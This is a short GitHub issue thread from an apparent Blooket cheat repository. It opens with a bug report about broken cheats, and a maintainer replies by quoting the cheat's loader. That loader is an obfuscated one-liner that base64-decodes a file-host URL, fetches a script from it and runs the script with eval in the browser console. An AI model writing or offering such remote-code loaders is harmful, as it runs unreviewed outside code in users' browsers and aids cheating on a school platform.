### ISSUE TITLE
it broken

### ISSUE THREAD

**Issue by imfue** [glixzzy/blooket-hack#577]
fishing frensy and gold requet is brok
<img width="960" alt="2021-12-06 (1)" src="https://user-images.githubusercontent.com/95630171/144856706-0b3ff170-34d9-4fb2-a891-be4b3cb737a3.png">
en

**Comment by 3kh0** [comment]
**Hello there!**

Your issue is not complete and we can not tell the problem!<br>

Here are some questions you should answer when creating an issue:
- What browser do you use? 
- Are you on a school computer and/or connected to the school internet?
- Are you using a bookmarklet or are you pasting the code into the console?
- Has the code worked before?
- Is it the original code? This is what the original code would look like: `fetch(atob('aHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vc2Nob29sLWNoZWF0cy9yYXcvdXBsb2FkL3YxNjM3NDUyMjEzL2dsb2JhbFNwYW1PcGVuQm94ZXMuanM=')).then((res) => res.text().then((t) => eval(t)))`

Thank you for letting us know the issue! 😀

**Comment by varedz** [comment]
Fixed.
